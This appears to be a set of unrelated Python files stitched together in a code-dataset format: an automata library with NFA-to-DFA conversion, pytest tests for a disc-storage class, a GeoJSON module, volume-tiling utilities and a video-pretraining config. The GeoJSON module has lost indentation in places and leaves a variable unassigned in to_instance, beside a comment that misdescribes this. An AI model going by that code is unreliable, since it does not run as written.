            The end state.
        """
        if len(self.end_states) == 1:
            return self.end_states[0]
        end_st = self.add_state(f"_end_{self.name}")
        for state in self.end_states:
            self.add_transition(state, end_st)
        self.end_states = [end_st]
        return end_st

    def set_single_start_end(self) -> Tuple[State, State]:
        """
        Set the automata to have a single start and end state.

        Returns
        -------
        Tuple[State, State]
            The start and end state.
        """
        start_st = self.set_single_start()
        end_st = self.set_single_end()
        return start_st, end_st

    def flat(self) -> Automata:
        """
        Flatten the automata.

        Renames every reachable state to ``q0, q1, ...`` (BFS order) and
        registers them in a fresh automata.

        Returns
        -------
        Automata
            The flattened automata.
        """
        flat = Automata(self.name)
        count = 0
        visited_states = []
        non_visited_states = self.start_states
        while non_visited_states:
            new_non_visited_states = []
            for state in non_visited_states:
                flat.add_state(
                    state,
                    state in self.start_states,
                    state in self.end_states,
                    name=f"q{count}",
                )
                state.name = f"q{count}"
                count += 1
                visited_states.append(state)
                for transition in state.transitions:
                    to_state = transition.to_state
                    if (
                        to_state not in visited_states
                        and to_state not in new_non_visited_states
                        and to_state not in non_visited_states
                    ):
                        new_non_visited_states.append(transition.to_state)
            non_visited_states = new_non_visited_states
        return flat

    def show(self) -> None:
        """
        Show the automata.
        """
        # Inverse name states dict
        inv_states = {v: k for k, v in self.states.items()}
        for name, state in self.states.items():
            print(name, f"Final: {state in self.end_states}")
            for transition in state.transitions:
                neg = "^" if transition.negated else ""
                print(
                    f"  ({neg}{transition.str_cond}) "
                    f"-> {inv_states[transition.to_state]}"
                )

    def _eps_closure_single(self, state: Union[str, State]) -> Set[State]:
        """
        Compute the epsilon closure of a single state.

        Parameters
        ----------
        state : Union[str, State]
            The state to compute the epsilon closure of.

        Returns
        -------
        Set[State]
            The epsilon closure of the state.

        Raises
        ------
        ValueError
            If the state does not exist.
        """
        if isinstance(state, str):
            if state not in self.states:
                raise ValueError(f"No state {state} defined.")
            state = self.states[state]
        visited = set()
        non_vsited = [state]
        while non_vsited:
            new_non_vsited = []
            for current_state in non_vsited:
                visited.add(current_state)
                for transition in current_state.transitions:
                    if transition.is_epsilon:
                        to_st = transition.to_state
                        if (
                            to_st not in visited
                            and to_st not in new_non_vsited
                            and to_st not in non_vsited
                        ):
                            new_non_vsited.append(to_st)
            non_vsited = new_non_vsited
        return visited

    def eps_closure(
        self, state: Union[str, State, Iterable[str], Iterable[State]]
    ) -> Set[State]:
        """
        Compute the epsilon closure of a state or a set of states.

        Parameters
        ----------
        state : Union[str, State, Iterable[str], Iterable[State]]
            The state or a list of states.

        Returns
        -------
        Set[State]
            The epsilon closure of the state or a set of states.

        Raises
        ------
        ValueError
            If any of the states does not exist.
        """
        if isinstance(state, (str, State)):
            return self._eps_closure_single(state)
        whole_closure = set()
        for current_state in state:
            whole_closure.update(self._eps_closure_single(current_state))
        return whole_closure

    def _goto_single(self, state: Union[str, State], symbol: str) -> Set[State]:
        """
        Compute the goto of a single state.

        Parameters
        ----------
        state : Union[str, State]
            The state to compute the goto of.
        symbol : str
            The symbol to compute the goto of.

        Returns
        -------
        Set[State]
            The goto of the state.

        Raises
        ------
        ValueError
            If the state does not exist.
        """
        if isinstance(state, str):
            if state not in self.states:
                raise ValueError(f"No state {state} defined.")
            state = self.states[state]
        answer = set()
        st_esp_closure = self.eps_closure(state)
        for current_state in st_esp_closure:
            for transition in current_state.transitions:
                if not transition.is_epsilon and transition.check_condition(symbol):
                    answer.add(transition.to_state)
        return answer

    def goto(
        self, state: Union[str, State, Iterable[str], Iterable[State]], symbol: str
    ) -> Set[State]:
        """
        Compute the goto of a state or a set of states.

        Parameters
        ----------
        state : Union[str, State, Iterable[str], Iterable[State]]
            The state or a list of states.
        symbol : str
            The symbol to compute the goto of.

        Returns
        -------
        Set[State]
            The goto of the state or a set of states.

        Raises
        ------
        ValueError
            If any of the states does not exist.
        """
        if isinstance(state, (str, State)):
            return self._goto_single(state, symbol)
        whole_goto = set()
        for current_state in state:
            whole_goto.update(self._goto_single(current_state, symbol))
        return whole_goto

    def to_dfa(self, dfa2nfa: bool = False) -> Union[Automata, Tuple[Automata, Dict]]:
        """
        Convert the automata to a DFA.

        Parameters
        ----------
        dfa2nfa : bool
            If True, the return value will be a tuple of the DFA and the dfa2nfa
            dictionary, otherwise only the DFA will be returned. By default, False.

        Returns
        -------
        Union[Automata, Tuple[Automata, Dict]]
            The DFA.
        """
        get_name = lambda states: "".join(sorted(x.name for x in states))
        alphabet = self.alphabet
        dfa = Automata(self.name)
        start_state = self.eps_closure(self.start_states)
        start_name = get_name(start_state)
        # BUG FIX: the start DFA state is final when *any* NFA state of its
        # closure is final.  The original tested ``set in list`` (membership
        # of the whole set as an element), which was always False, so the
        # start state was never marked final and e.g. the empty string was
        # rejected by automata that should accept it.
        q_0 = dfa.add_state(
            start_name,
            start=True,
            end=any(s in self.end_states for s in start_state),
        )
        dfa_to_nfa = {q_0: start_state}
        visited = set()
        non_visited = [q_0]
        while non_visited:
            new_non_visited = []
            for current_state in non_visited:
                if current_state in visited:
                    continue
                visited.add(current_state)
                for char in alphabet:
                    goto_states = self.goto(dfa_to_nfa[current_state], char)
                    if not goto_states:
                        continue
                    next_state = self.eps_closure(goto_states)
                    next_name = get_name(next_state)
                    if next_name not in dfa.states:
                        dfa_state = dfa.add_state(
                            next_name,
                            end=any(s in self.end_states for s in next_state),
                        )
                        dfa_to_nfa[dfa_state] = next_state
                        new_non_visited.append(dfa_state)
                    else:
                        dfa_state = dfa.states[next_name]
                        # BUG FIX: schedule the *DFA* state for processing.
                        # The original compared the NFA state-set against
                        # lists of DFA states (always "not in"), queueing
                        # duplicates on every iteration.
                        if (
                            dfa_state not in visited
                            and dfa_state not in new_non_visited
                        ):
                            new_non_visited.append(dfa_state)
                    dfa.add_transition(current_state.name, next_name, char)
            non_visited = new_non_visited
        return dfa if not dfa2nfa else (dfa, dfa_to_nfa)

    def run(
        self,
        input_: Iterable,
        stop_at_end: bool = False,
    ) -> bool:
        """
        Run the automata on the given input.

        Parameters
        ----------
        input_ : Iterable
            The input to run the automata on.
        stop_at_end : bool
            Whether to stop the automata at the first end state encountered.

        Returns
        -------
        bool
            Whether the automata succeeded.

        Raises
        ------
        ValueError
            If the automata has no start state.
        """
        if not self.start_states:
            raise ValueError("No start states defined.")
        self._pos = 0
        self._processes_idx = 0
        self._input = input_
        # One "process" per start state; each is (state, input position).
        self._processes = [(st, self._pos) for st in self.start_states]
        while self._processes:
            stop = self._step()
            if self._current_state in self.end_states:
                if stop_at_end:
                    return True
            if stop:
                break
        else:
            # All processes died without reaching an end state.
            return False
        logging.debug(f"Final {self._processes_idx} {self._processes}")
        return self._current_state in self.end_states

    def _step(self):
        """Advance one process by one transition step.

        Returns True when the current process has consumed the whole input
        while sitting on an end state (i.e. the run may stop).
        """
        self._current_state, self._pos = self._processes[self._processes_idx]
        self._current_state.visited()
        if self._pos > len(self._input):
            # Ran past the input: this process is dead.
            self._processes.pop(self._processes_idx)
            return False
        new_processes = 0
        logging.debug(f"{self._processes_idx} {self._processes}")
        for transition in self._current_state.transitions:
            if transition.is_epsilon or (
                0 <= self._pos < len(self._input)
                and transition.check_condition(self._input[self._pos])
            ):
                run_state = (transition.to_state, self._pos + transition.action)
                if new_processes == 0:
                    # Reuse the current slot for the first branch; fork the rest.
                    self._processes[self._processes_idx] = run_state
                else:
                    self._processes.append(run_state)
                new_processes += 1
        if not new_processes:
            self._processes.pop(self._processes_idx)
        if self._processes:
            # Round-robin over the surviving processes.
            self._processes_idx = (self._processes_idx + 1) % len(self._processes)
        if self._pos >= len(self._input) or self._pos < 0:
            return self._current_state in self.end_states
        return False
| StarcoderdataPython |
3231747 | <reponame>Bystroushaak/BalancedDiscStorage
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
import os
import shutil
import os.path
import tempfile
from os.path import join
import pytest
from BalancedDiscStorage import BalancedDiscStorageZ
from test_balanced_disc_storage import data_file_context
# Variables ===================================================================
TEMP_DIR = None
# Fixtures ====================================================================
@pytest.fixture
def bdsz():
    # Fresh storage instance rooted at the module-level temp directory
    # (created in setup_module).
    return BalancedDiscStorageZ(TEMP_DIR)
@pytest.fixture
def archive_file():
    # Context manager yielding the bundled test archive ``archive.zip``.
    return data_file_context("archive.zip")
# Known storage hash of ``archive.zip`` (content hash + "_" + size suffix).
ARCHIVE_FILE_HASH = "b5770bf1233f932fb5d5729a07fc786e3040bcdbe528b70a4ad2cbc3b6eb2380_12d"


def _archive_file_path():
    """Plain helper (not a fixture) computing the unpack directory.

    The original fixtures called other ``@pytest.fixture``-decorated
    functions directly, which is an error in pytest >= 4; plain helpers
    avoid that.
    """
    return join(TEMP_DIR, ARCHIVE_FILE_HASH[0], ARCHIVE_FILE_HASH) + "/"


@pytest.fixture
def archive_file_hash():
    """Expected storage hash of ``archive.zip``."""
    return ARCHIVE_FILE_HASH


@pytest.fixture
def archive_file_path():
    """Directory where the unpacked archive is expected to live."""
    return _archive_file_path()


@pytest.fixture
def archive_filenames():
    """Full paths of the files contained in ``archive.zip``."""
    return [
        join(_archive_file_path(), fn)
        for fn in ["metadata.xml", "some.pdf"]
    ]
# Setup =======================================================================
def setup_module():
    """Create the temporary storage root shared by all tests."""
    global TEMP_DIR
    TEMP_DIR = tempfile.mkdtemp()
def teardown_module():
    """Remove the temporary storage root and everything inside it."""
    shutil.rmtree(TEMP_DIR)
# Tests =======================================================================
def test_init():
    """Constructor requires a path argument."""
    bdsz = BalancedDiscStorageZ(TEMP_DIR)
    with pytest.raises(TypeError):
        BalancedDiscStorageZ()
def test_add_archive_as_dir(bdsz, archive_file, archive_file_hash,
                            archive_file_path, archive_filenames):
    """Adding a zip unpacks it into the hash-derived directory."""
    bdsz.dir_limit = 20
    assert not os.path.exists(archive_file_path)
    bdsz.add_archive_as_dir(archive_file)
    assert os.path.exists(archive_file_path)
    assert os.path.isdir(archive_file_path)
    for filename in archive_filenames:
        assert os.path.exists(filename)
        assert os.path.isfile(filename)
def test_add_archie_twice(bdsz, archive_file, archive_file_hash,
                          archive_file_path, archive_filenames):
    # NOTE(review): "archie" is a typo for "archive"; kept to preserve the
    # test id. Adding the same archive twice must be idempotent.
    bdsz.add_archive_as_dir(archive_file)
    bdsz.add_archive_as_dir(archive_file)
    assert os.path.exists(archive_file_path)
    assert os.path.isdir(archive_file_path)
    for filename in archive_filenames:
        assert os.path.exists(filename)
        assert os.path.isfile(filename)
def test_path_from_hash_for_zip(bdsz, archive_file_path, archive_file_hash):
    """Hash lookup resolves to the unpack directory."""
    assert bdsz.file_path_from_hash(archive_file_hash) == archive_file_path
def test_delete_by_file_zip(bdsz, archive_file, archive_file_path):
    """Deleting by file removes the unpack directory and empty parents."""
    assert os.path.exists(archive_file_path)
    assert os.path.isdir(archive_file_path)
    bdsz.delete_by_file(archive_file)
    assert not os.path.exists(archive_file_path)
    assert not os.path.isdir(archive_file_path)
    # check that blank directories are also cleaned
    assert not os.path.exists(join(TEMP_DIR, "b"))
def test_too_many_zip_files(bdsz, archive_file):
    """Exceeding ``max_zipfiles`` raises ValueError."""
    bdsz.max_zipfiles = 1
    with pytest.raises(ValueError):
        bdsz.add_archive_as_dir(archive_file)
| StarcoderdataPython |
4821266 | from __future__ import unicode_literals
try:
import simplejson as json
except ImportError:
import json
# ``MutableMapping`` moved to ``collections.abc`` in Python 3.3 and was
# removed from ``collections`` in Python 3.10, so try the new location first.
try:
    from collections.abc import MutableMapping
except ImportError:  # pragma: no cover - Python 2 fallback
    from collections import MutableMapping
import sys
from decimal import Decimal

# Alias used by ``is_mapping`` checks throughout this module.
mapping_base = MutableMapping
GEO_INTERFACE_MARKER = "__geo_interface__"
class GeoJSON(dict):
    """
    A class representing a GeoJSON object.

    Subclasses ``dict`` so instances serialize directly with ``json``;
    attribute access is forwarded to dictionary items.
    """
    def __init__(self, iterable=(), **extra):
        """
        Initialises a GeoJSON object
        :param iterable: iterable from which to draw the content of the GeoJSON
        object.
        :type iterable: dict, array, tuple
        :return: a GeoJSON object
        :rtype: GeoJSON
        """
        super(GeoJSON, self).__init__(iterable)
        # Default the GeoJSON "type" member to the subclass name unless the
        # input already provided one (via the attribute/item forwarding).
        self["type"] = getattr(self, "type", type(self).__name__)
        self.update(extra)
    def __repr__(self):
        # Stable key order so reprs are deterministic and comparable.
        return dumps(self, sort_keys=True)
    __str__ = __repr__
    def __getattr__(self, name):
        """
        Permit dictionary items to be retrieved like object attributes
        :param name: attribute name
        :type name: str, int
        :return: dictionary value
        """
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name)
    def __setattr__(self, name, value):
        """
        Permit dictionary items to be set like object attributes.
        :param name: key of item to be set
        :type name: str
        :param value: value to set item to
        """
        self[name] = value
    def __delattr__(self, name):
        """
        Permit dictionary items to be deleted like object attributes
        :param name: key of item to be deleted
        :type name: str
        """
        del self[name]
    @property
    def __geo_interface__(self):
        # The bare GeoJSON base type intentionally exposes no geo interface
        # (returns None implicitly); concrete subclasses expose themselves.
        if self.type != "GeoJSON":
            return self
    @classmethod
    def to_instance(cls, ob, default=None, strict=False):
        """Encode a GeoJSON dict into an GeoJSON object.
        Assumes the caller knows that the dict should satisfy a GeoJSON type.
        :param cls: Dict containing the elements to be encoded into a GeoJSON
        object.
        :type cls: dict
        :param ob: GeoJSON object into which to encode the dict provided in
        `cls`.
        :type ob: GeoJSON
        :param default: A default instance to append the content of the dict
        to if none is provided.
        :type default: GeoJSON
        :param strict: Raise error if unable to coerce particular keys or
        attributes to a valid GeoJSON structure.
        :type strict: bool
        :return: A GeoJSON object with the dict's elements as its constituents.
        :rtype: GeoJSON.object
        :raises TypeError: If the input dict contains items that are not valid
        GeoJSON types.
        :raises UnicodeEncodeError: If the input dict contains items of a type
        that contain non-ASCII characters.
        :raises AttributeError: If the input dict contains items that are not
        valid GeoJSON types.
        """
        if ob is None and default is not None:
            instance = default()
        elif isinstance(ob, GeoJSON):
            instance = ob
        else:
            # Coerce to a mapping and take a shallow copy so popping "type"
            # below does not mutate the caller's object.
            mapping = to_mapping(ob)
            d = {}
            for k in mapping:
                d[k] = mapping[k]
            try:
                type_ = d.pop("type")
                try:
                    type_ = str(type_)
                except UnicodeEncodeError:
                    # If the type contains non-ascii characters, we can assume
                    # it's not a valid GeoJSON type
                    raise AttributeError("{0} is not a GeoJSON type".format(type_))
                # NOTE(review): the factory dispatch below is disabled, so a
                # valid "type" currently falls through to ``instance = ob``
                # via the popped-key path — confirm this is intended.
                # geojson_factory = getattr(all, type_)
                # if not issubclass(geojson_factory, GeoJSON):
                #     raise TypeError("""\
                #     Not a valid GeoJSON type:
                #     %r (geojson_factory: %r, cls: %r)
                #     """ % (type_, geojson_factory, cls))
                # instance = geojson_factory(**d)
            except (AttributeError, KeyError) as invalid:
                if strict:
                    msg = "Cannot coerce %r into a valid GeoJSON structure: %s"
                    msg %= (ob, invalid)
                    raise ValueError(msg)
                instance = ob
        return instance
class Geometry(GeoJSON):
    """
    Represents an abstract base class for a WGS84 geometry.
    """
    # Name-mangled to _Geometry__JSON_compliant_types; accessed below via
    # ``cls.__JSON_compliant_types`` (mangling applies inside the class body).
    if sys.version_info[0] == 3:
        # Python 3.x has no long type
        __JSON_compliant_types = (float, int, Decimal)
    else:
        __JSON_compliant_types = (float, int, Decimal, long) # noqa
    def __init__(self, coordinates=None, crs=None, **extra):
        """
        Initialises a Geometry object.
        :param coordinates: Coordinates of the Geometry object.
        :type coordinates: tuple
        :param crs: CRS
        :type crs: CRS object
        """
        super(Geometry, self).__init__(**extra)
        self["coordinates"] = coordinates or []
        # Validate eagerly so invalid coordinate values fail at construction.
        self.clean_coordinates(self["coordinates"])
        if crs:
            self["crs"] = self.to_instance(crs, strict=True)
    @classmethod
    def clean_coordinates(cls, coords):
        """Recursively verify every coordinate is a JSON-compliant number.

        :raises ValueError: if any leaf value is not a valid number type.
        """
        for coord in coords:
            if isinstance(coord, (list, tuple)):
                cls.clean_coordinates(coord)
            elif not isinstance(coord, cls.__JSON_compliant_types):
                raise ValueError("%r is not JSON compliant number" % coord)
class GeometryCollection(GeoJSON):
    """
    Represents an abstract base class for collections of WGS84 geometries.
    """

    def __init__(self, geometries=None, **extra):
        """Initialise the collection, defaulting to an empty geometry list."""
        super(GeometryCollection, self).__init__(**extra)
        self["geometries"] = [] if not geometries else geometries
# Marker classes: each fixes the GeoJSON "type" member via its class name
# (see GeoJSON.__init__); no extra behaviour is needed.
class Point(Geometry):
    """A single WGS84 position."""
    pass
class MultiPoint(Geometry):
    """A collection of positions."""
    pass
class LineString(MultiPoint):
    """An ordered sequence of positions; shares MultiPoint's coordinate shape."""
    pass
class MultiLineString(Geometry):
    """A collection of LineString coordinate arrays."""
    pass
class Polygon(Geometry):
    """A polygon given as an array of linear rings."""
    pass
class MultiPolygon(Geometry):
    """A collection of Polygon coordinate arrays."""
    pass
class Default(object):
    """
    GeoJSON default object.
    """
class Feature(GeoJSON):
    """
    Represents a WGS84 GIS feature.
    """

    def __init__(self, id=None, geometry=None, properties=None, **extra):
        """
        Initialise a Feature.

        :param id: optional feature identifier (omitted from the dict when
            None).
        :param geometry: geometry of the feature; coerced through
            ``to_instance`` when truthy, stored as None otherwise.
        :param properties: optional dict of feature properties.
        """
        super(Feature, self).__init__(**extra)
        if id is not None:
            self["id"] = id
        if geometry:
            self["geometry"] = self.to_instance(geometry, strict=True)
        else:
            self["geometry"] = None
        self["properties"] = {} if not properties else properties
class FeatureCollection(GeoJSON):
    """
    Represents a FeatureCollection, a set of multiple Feature objects.
    """
    def __init__(self, features, **extra):
        """
        Initialises a FeatureCollection object from the
        :param features: List of features to constitute the FeatureCollection.
        :type features: list
        :return: FeatureCollection object
        :rtype: FeatureCollection
        """
        super(FeatureCollection, self).__init__(**extra)
        self["features"] = features
class GeoJSONEncoder(json.JSONEncoder):
    """JSON encoder that coerces unknown objects through GeoJSON.to_instance."""
    def default(self, obj):
        # Called by json for objects it cannot serialise natively.
        return GeoJSON.to_instance(obj)
# Wrap the functions from json, providing encoder, decoders, and
# object creation hooks.
# Here the defaults are set to only permit valid JSON as per RFC 4267
def _enforce_strict_numbers(obj):
if isinstance(obj, (int, float)):
raise ValueError("Number %r is not JSON compliant" % obj)
def dump(obj, fp, cls=GeoJSONEncoder, allow_nan=False, **kwargs):
    """Serialise *obj* as GeoJSON to the open file *fp*.

    The object is first coerced through ``to_mapping`` so that anything
    exposing ``__geo_interface__`` can be dumped; ``allow_nan`` defaults to
    False to keep output RFC 4627 compliant.
    """
    mapping = to_mapping(obj)
    return json.dump(mapping, fp, cls=cls, allow_nan=allow_nan, **kwargs)
def dumps(obj, cls=GeoJSONEncoder, allow_nan=False, **kwargs):
    """Serialise *obj* to a GeoJSON string.

    Coerces *obj* through ``to_mapping`` first; ``allow_nan`` defaults to
    False to keep output RFC 4627 compliant.
    """
    mapping = to_mapping(obj)
    return json.dumps(mapping, cls=cls, allow_nan=allow_nan, **kwargs)
def load(fp,
         cls=json.JSONDecoder,
         parse_constant=_enforce_strict_numbers,
         object_hook=GeoJSON.to_instance,
         **kwargs):
    """Deserialise GeoJSON from the open file *fp*.

    Objects are passed through ``GeoJSON.to_instance`` and NaN/Infinity
    constants are rejected by default (strict RFC 4627 parsing).
    """
    return json.load(fp,
                     cls=cls, object_hook=object_hook,
                     parse_constant=parse_constant,
                     **kwargs)
def loads(s,
          cls=json.JSONDecoder,
          parse_constant=_enforce_strict_numbers,
          object_hook=GeoJSON.to_instance,
          **kwargs):
    """Deserialise GeoJSON from the string *s*.

    Objects are passed through ``GeoJSON.to_instance`` and NaN/Infinity
    constants are rejected by default (strict RFC 4627 parsing).
    """
    return json.loads(s,
                      cls=cls, object_hook=object_hook,
                      parse_constant=parse_constant,
                      **kwargs)
# Backwards compatibility
PyGFPEncoder = GeoJSONEncoder
def is_mapping(obj):
    """
    Checks if the object is an instance of MutableMapping.
    :param obj: Object to be checked.
    :return: Truth value of whether the object is an instance of
    MutableMapping.
    :rtype: bool
    """
    return isinstance(obj, MutableMapping)
def to_mapping(obj):
    """Best-effort conversion of *obj* into a mapping.

    Precedence: the object's ``__geo_interface__`` attribute, then objects
    that already are mutable mappings, then GeoJSON instances (copied to a
    plain dict), and finally a JSON round-trip for anything else.
    """
    geo = getattr(obj, GEO_INTERFACE_MARKER, None)
    if geo is not None:
        return geo
    if is_mapping(obj):
        return obj
    if isinstance(obj, GeoJSON):
        return dict(obj)
    return json.loads(json.dumps(obj))
class CoordinateReferenceSystem(GeoJSON):
    """Base class for GeoJSON coordinate reference system (CRS) objects."""

    def __init__(self, properties=None, **extra):
        """Initialise the CRS with an optional ``properties`` dict."""
        super(CoordinateReferenceSystem, self).__init__(**extra)
        self["properties"] = {} if not properties else properties
class Named(CoordinateReferenceSystem):
    """
    Represents a named CRS (``"type": "name"``).
    """
    def __init__(self, properties=None, **extra):
        """Initialise a named CRS and tag it with type ``"name"``."""
        super(Named, self).__init__(properties=properties, **extra)
        self["type"] = "name"
    # The original defined ``__repr__`` as a bare pass-through to
    # ``super().__repr__()``; that redundant override has been removed —
    # behaviour is identical.
class Linked(CoordinateReferenceSystem):
    """
    Represents a linked CRS.
    """
    def __init__(self, properties=None, **extra):
        """Initialise a linked CRS and tag it with type ``"link"``."""
        super(Linked, self).__init__(properties=properties, **extra)
        self["type"] = "link"
class CrsDefault(object):
    """GeoJSON default, long/lat WGS84, is not serialized."""
ALL = ([Point, LineString, Polygon, MultiLineString, MultiPoint, MultiPolygon, GeometryCollection, Feature,
FeatureCollection, GeoJSON])
name = Named
link = Linked
| StarcoderdataPython |
3347917 | from __future__ import print_function, division
import numpy as np
import random
import torch
import os
# TODO: combine with data/misc/*.py
####################################################################
## Process image stacks.
####################################################################
def count_volume(data_sz, vol_sz, stride):
    """Number of sliding-window positions per axis.

    Generalized to accept lists/tuples as well as ndarrays (the original
    required ``stride`` to be an ndarray because it called ``.astype``).

    :param data_sz: per-axis size of the full volume.
    :param vol_sz: per-axis size of the sliding window.
    :param stride: per-axis step between window positions.
    :return: int ndarray with the per-axis position count.
    """
    data_sz = np.asarray(data_sz)
    vol_sz = np.asarray(vol_sz)
    stride = np.asarray(stride, dtype=float)
    return 1 + np.ceil((data_sz - vol_sz) / stride).astype(int)
def crop_volume(data, sz, st=(0, 0, 0)):  # C*D*W*H, C=1
    """Crop a 3-D subvolume of size ``sz`` starting at offset ``st``."""
    z0, y0, x0 = np.array(st).astype(np.int32)
    return data[z0:z0 + sz[0], y0:y0 + sz[1], x0:x0 + sz[2]]
def crop_volume_mul(data, sz, st=(0, 0, 0)):  # C*D*W*H, for multi-channel input
    """Crop the last three axes of a multi-channel (C, D, W, H) volume."""
    spatial = tuple(slice(off, off + length) for off, length in zip(st, sz))
    return data[(slice(None),) + spatial]
####################################################################
## Rebalancing.
####################################################################
def rebalance_binary_class(label, mask=None, base_w=1.0):
    """Binary-class rebalancing.

    Computes the positive-class frequency (clamped below at 1e-2) and a
    per-element weight tensor that up-weights positives by the inverse odds.
    ``mask`` and ``base_w`` are accepted for interface compatibility but are
    currently unused.
    """
    total_elems = torch.prod(torch.tensor(label.size()).float())
    weight_factor = torch.clamp(label.float().sum() / total_elems, min=1e-2)
    alpha = 1.0
    pos_weight = label * (1 - weight_factor) / weight_factor
    weight = alpha * pos_weight + (1 - label)
    return weight_factor, weight
####################################################################
## Affinitize.
####################################################################
def check_volume(data):
    """Ensure that data is a numpy 3D array.

    2-D input gains a leading singleton axis; 4-D input must have a leading
    axis of length 1, which is squeezed away. Anything else raises.
    """
    assert isinstance(data, np.ndarray)
    ndim = data.ndim
    if ndim == 2:
        data = data[np.newaxis, ...]
    elif ndim == 4:
        assert data.shape[0] == 1
        data = np.reshape(data, data.shape[-3:])
    elif ndim != 3:
        raise RuntimeError('data must be a numpy 3D array')
    assert data.ndim == 3
    return data
# def affinitize(img, dst=(1,1,1), dtype=np.float32):
# """
# Transform segmentation to an affinity map.
# Args:
# img: 3D indexed image, with each index corresponding to each segment.
# Returns:
# ret: an affinity map (4D tensor).
# """
# img = check_volume(img)
# if ret is None:
# ret = np.zeros(img.shape, dtype=dtype)
# # Sanity check.
# (dz,dy,dx) = dst
# assert abs(dx) < img.shape[-1]
# assert abs(dy) < img.shape[-2]
# assert abs(dz) < img.shape[-3]
####################################################################
## tile to volume
####################################################################
def vast2Seg(seg):
    """Decode a VAST RGB label image into 24-bit integer segment ids."""
    red = seg[:, :, 0].astype(np.uint32)
    green = seg[:, :, 1].astype(np.uint32)
    blue = seg[:, :, 2].astype(np.uint32)
    # R is the high byte, G the middle byte, B the low byte.
    return (red << 16) + (green << 8) + blue
def tileToVolume(tiles, x0, x1, y0, y1, z0, z1, tile_sz, dt=np.uint8, tile_st=(0, 0), tile_ratio=1, resize_order=1, ndim=1, black=128):
    """Assemble the subvolume [z0:z1, y0:y1, x0:x1] from per-slice image tiles.

    :param tiles: per-slice path patterns; ``{row}``/``{column}`` are filled
        in when present, otherwise the pattern is used as a literal path.
    :param x0, x1, y0, y1, z0, z1: bounds of the requested subvolume
        (x = column axis, y = row axis; no padding at the boundary).
    :param tile_sz: edge length of one square tile.
    :param dt: output dtype.
    :param tile_st: (row, column) starting index offset (0 or 1).
        BUG FIX: was the mutable default ``[0, 0]``; a tuple avoids the
        shared-mutable-default trap without changing behaviour.
    :param tile_ratio: optional zoom factor applied to each tile.
    :param resize_order: interpolation order; 0 means label data.
    :param ndim: for labels, 1 = single-channel ids, else 3-channel VAST RGB.
    :param black: fill value used when a tile file is missing.
    """
    result = np.zeros((z1-z0, y1-y0, x1-x0), dt)
    c0 = x0 // tile_sz # floor
    c1 = (x1 + tile_sz-1) // tile_sz # ceil
    r0 = y0 // tile_sz
    r1 = (y1 + tile_sz-1) // tile_sz
    for z in range(z0, z1):
        pattern = tiles[z]
        for row in range(r0, r1):
            for column in range(c0, c1):
                if '{' in pattern:
                    path = pattern.format(row=row+tile_st[0], column=column+tile_st[1])
                else:
                    path = pattern
                if not os.path.exists(path):
                    # Missing tile: substitute a uniform "black" patch.
                    patch = black*np.ones((tile_sz,tile_sz),dtype=dt)
                else:
                    # Deferred imports keep tifffile/imageio optional.
                    if path[-3:]=='tif':
                        import tifffile
                        patch = tifffile.imread(path)
                    else:
                        from imageio import imread
                        patch = imread(path)
                if tile_ratio != 1:
                    # scipy.misc.imresize: only do uint8
                    from scipy.ndimage import zoom
                    patch = zoom(patch, [tile_ratio,tile_ratio,1], order=resize_order)
                if patch.ndim==2:
                    patch=patch[:,:,None]
                # Tile extent in global coordinates; last tile may not be full.
                xp0 = column * tile_sz
                xp1 = xp0 + patch.shape[1]
                yp0 = row * tile_sz
                yp1 = yp0 + patch.shape[0]
                if patch is not None:
                    # Intersect the tile with the requested window.
                    x0a = max(x0, xp0)
                    x1a = min(x1, xp1)
                    y0a = max(y0, yp0)
                    y1a = min(y1, yp1)
                    sz = result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0].shape
                    if resize_order==0: # label
                        if ndim==1: # 1-channel coding
                            result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0] = patch[y0a-yp0:y1a-yp0, x0a-xp0:x1a-xp0,0].reshape(sz)
                        else: # 3-channel coding
                            result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0] = vast2Seg(patch[y0a-yp0:y1a-yp0, x0a-xp0:x1a-xp0]).reshape(sz)
                    else: # image
                        result[z-z0, y0a-y0:y1a-y0, x0a-x0:x1a-x0] = patch[y0a-yp0:y1a-yp0, x0a-xp0:x1a-xp0].reshape(sz)
    return result
| StarcoderdataPython |
dist_params = dict(backend='nccl')
log_level = 'INFO'
# Checkpoint handling: start from scratch (no pretrained weights, no resume).
load_from = None
resume_from = None
# Use synchronized BatchNorm across GPUs.
syncbn = True

# Training data pipeline for the CtP (Catch-the-Patch) pretext task on UCF-101.
data = dict(
    videos_per_gpu=4,  # total batch size is 8Gpus*4 == 32
    workers_per_gpu=4,
    train=dict(
        type='CtPDataset',
        data_source=dict(
            type='JsonClsDataSource',
            ann_file='ucf101/annotations/train_split_1.json',
        ),
        # Frames are read directly out of per-video zip archives.
        backend=dict(
            type='ZipBackend',
            zip_fmt='ucf101/zips/{}.zip',
            frame_fmt='img_{:05d}.jpg',
        ),
        # One 16-frame clip per video with a randomly chosen frame stride.
        frame_sampler=dict(
            type='RandomFrameSampler',
            num_clips=1,
            clip_len=16,
            strides=[1, 2, 3, 4, 5],
            temporal_jitter=True
        ),
        transform_cfg=[
            dict(type='GroupScale', scales=[112, 128, 144]),
            dict(type='GroupRandomCrop', out_size=112),
            dict(type='GroupFlip', flip_prob=0.50),
            # Core CtP augmentation: paste moving patches whose trajectories
            # the model must later regress.
            dict(
                type='PatchMask',
                region_sampler=dict(
                    scales=[16, 24, 28, 32, 48, 64],
                    ratios=[0.5, 0.67, 0.75, 1.0, 1.33, 1.50, 2.0],
                    scale_jitter=0.18,
                    num_rois=3,
                ),
                key_frame_probs=[0.5, 0.3, 0.2],
                loc_velocity=3,
                size_velocity=0.025,
                label_prob=0.8
            ),
            # Photometric jitter applied per clip.
            dict(type='RandomHueSaturation', prob=0.25, hue_delta=12, saturation_delta=0.1),
            dict(type='DynamicBrightness', prob=0.5, delta=30, num_key_frame_probs=(0.7, 0.3)),
            dict(type='DynamicContrast', prob=0.5, delta=0.12, num_key_frame_probs=(0.7, 0.3)),
            # Normalize with ImageNet mean/std after BGR->RGB swap.
            dict(
                type='GroupToTensor',
                switch_rgb_channels=True,
                div255=True,
                mean=(0.485, 0.456, 0.406),
                std=(0.229, 0.224, 0.225)
            )
        ]
    )
)

# optimizer
total_epochs = 300
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
